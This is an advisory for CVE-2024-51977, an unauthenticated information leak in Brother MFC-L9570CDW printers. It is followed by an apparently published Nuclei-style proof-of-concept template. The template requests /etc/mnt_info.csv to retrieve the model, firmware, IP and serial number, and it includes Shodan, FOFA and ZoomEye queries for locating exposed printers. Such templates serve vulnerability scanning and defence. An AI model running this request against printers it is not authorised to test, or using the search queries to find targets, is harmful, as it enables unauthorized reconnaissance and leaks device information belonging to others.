An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.
PoC代码[已公开]
id: CVE-2024-51977
info:
name: Brother MFC-L9570CDW - Information Disclosure
author: DhiyaneshDK,iamnoooob,darses
severity: medium
description: |
An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.
reference:
- https://github.com/sfewer-r7/BrotherVulnerabilities/blob/main/CVE-2024-51977.rb
classification:
epss-score: 0.48996
epss-percentile: 0.97705
metadata:
verified: true
max-request: 1
shodan-query: html:"MFC-L9570CDW"
fofa-query:
- app="brother-Printer"
zoomeye-query:
- device="brother-Printer" || app="brother-Printer"
tags: cve,cve2024,brother,mfc,printer,exposure,vkev
http:
- method: GET
path:
- "{{BaseURL}}/etc/mnt_info.csv"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"Model Name"'
- '"IP Address"'
condition: and
- type: dsl
dsl:
- "status_code == 200"
- 'contains(content_type, "text/comma-separated-values")'
condition: and
# digest: 490a0046304402201fb4992d633877f3612024279068792fcf0df2661b4fca61e1049528885b794b02200c27575cf5f112441ae9e95786afd409c09a231372341cb262fb305eebe3a1d3:922c64590222798bb761d5b6d8e72950